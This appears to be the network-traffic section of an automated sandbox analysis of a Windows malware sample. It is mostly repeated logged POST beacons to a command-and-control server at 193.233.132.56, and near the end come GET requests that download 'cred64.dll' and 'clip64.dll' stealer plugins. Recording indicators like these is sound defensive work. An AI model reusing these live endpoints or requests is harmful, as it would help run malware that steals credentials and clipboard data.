                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: Joe Sandbox View IP Address: 193.233.132.56
                                Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU
                                Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_00E1D8D0 recv,recv,recv,recv, 0_2_00E1D8D0
                                Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1 Host: 193.233.132.56
                                Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1 Host: 193.233.132.56
                                Source: unknown HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.56 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/CoreCommonProxyStub.dll
